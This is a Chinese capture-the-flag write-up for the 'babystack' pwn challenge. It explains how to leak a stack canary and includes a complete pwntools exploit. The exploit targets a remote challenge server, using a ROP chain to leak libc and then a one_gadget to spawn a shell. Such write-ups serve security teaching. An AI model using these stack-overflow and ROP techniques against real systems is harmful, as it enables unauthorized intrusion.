(攻防世界)(pwn)pwn1(厦门邀请赛)babystack
canary!canary!canary! 拿到题目,下载附件,查看保护。
文章图片
可以很清楚的看到,程序开了canary,这就说明我们不能实现暴力的栈溢出,还要考虑这个canary的值。
【(攻防世界)(pwn)pwn1(厦门邀请赛)babystack】我们首先运行一下程序:
文章图片
可以很清楚的看出程序的功能,当我们选择1时,我们就可以输入,当我们选择2时,我们可以输出我们前面输入的东西。
进入IDA看源代码:
文章图片
我们可以看到canary的值存放在v6里,v6距离rbp8h,而我们输入的值距离rbp90h,故,我们可以输入0x88h个字符把canary带出来。
文章图片
我们发现,输入136个字符后,再输出时会出现换行后带出来一段字符,没错,你没有猜错,这就是canary。
我们就可以得到canary了。然后就可以进行通常的栈溢出了。
这里我们使用one_gadget,当然也可以使用普通泄露地址(反正都要泄露)
文章图片
到这里,canary也就出来了,接下来的工作也就不详细介绍了,下面给出完整exp:
#!/usr/bin/env python
from pwn import *
elf=ELF('./babystack')
libc=ELF('./libc-2.23.so')
p=remote('111.198.29.45',52070)
prdi_addr=0x0400a93
main_addr=0x0400908
one_gadget_addr=0x45216
put_plt=elf.plt['puts']
put_got=elf.got['puts']
p.sendlineafter('>> ','1')
p.sendline('a'*0x88)
p.sendlineafter('>> ','2')
p.recvuntil('a'*0x88+'\n')
canary=u64(p.recv(7).rjust(8,'\x00'))
print hex(canary)
p.sendlineafter('>> ','1')
payload='a'*0x88+p64(canary)+'a'*8+p64(prdi_addr)+p64(put_got)+p64(put_plt)+p64(main_addr)
p.sendline(payload)
p.recv()
p.sendlineafter('>> ','3')
put_addr=u64(p.recv(8).ljust(8,'\x00'))
print hex(put_addr)
libc_base=put_addr-libc.symbols['puts']
flag=libc_base+one_gadget_addr
p.sendlineafter('>> ','1')
payload1='a'*0x88+p64(canary)+'a'*8+p64(flag)
p.sendline(payload1)
p.sendlineafter('>> ','3')
p.interactive()
推荐阅读
- 诗歌:|诗歌: 《让我们举起世界杯,干了!》
- 迷失的世界(二十七)
- 金庸们的武侠世界,陪你走过少年时代吗()
- 我的世界同人小说《暮色齿轮》第三回|我的世界同人小说《暮色齿轮》第三回 回忆
- 不以胜负论出关
- “成年人的世界,命都是钱给的”
- 归乡-序章(世界伊始,人类无所依靠,我的故事就从这里开始...)
- 4.23世界阅读日,樊登读书狂欢放送,听书中成长
- 诱惑的世界
- 世界之大,包罗万象--|世界之大,包罗万象-- 读《我不过低配的人生》